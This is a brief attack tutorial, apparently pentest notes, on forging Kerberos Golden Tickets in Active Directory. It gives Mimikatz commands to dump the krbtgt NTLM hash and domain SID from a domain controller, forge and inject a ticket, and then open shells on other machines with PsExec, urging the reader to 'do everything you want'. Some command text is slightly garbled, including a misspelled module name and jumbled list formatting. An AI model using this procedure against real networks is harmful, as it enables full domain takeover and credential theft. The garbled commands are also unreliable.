Definition
Golden Ticket Attacks allow you to have the complete access to every machine in the domain since the compromised krbtgt account allows you to have access to any system or resource in the domain (you own the place that distributes tickets!).
The tickets can be generated once we have the SID and krbtgthash.
Executing Golden Ticket and Pass the Ticket Attacks
- Transfer Mimikatz to the DC and run it using a privileged PowerShell
- Enter debug mode
privilege::debug - Run
lsadump::lsa /inject /name:krbtgt - Keep the following
- The SID of the domain, and it should look like this
S-1-5-21-1560779125-3848459138-2476674860 - The primary NTLM hash of
krbtgtaccount
- The SID of the domain, and it should look like this
- Now we have all of the requirements (SID and NTLM hash), we can perform the attacks using the following command
mimikatz # kerebros::golden /User:<real-user> /domain:<domain> /sid:<sid> /krbtgt:<krbtgt-NTLM-hash> /id:500 /ptt- Run
misc::cmdand now you have a ticket in the current CMD session for any system or resource in the domain!- From there, you can DO EVERYTHING YOU WANT TO ANY RESOURCE OR MACHINE. For example if you want to pop a shell, download PsExec.exe and run the following command
psexec.exe \\<pc-name(not-username)>cmd.exe
- From there, you can DO EVERYTHING YOU WANT TO ANY RESOURCE OR MACHINE. For example if you want to pop a shell, download PsExec.exe and run the following command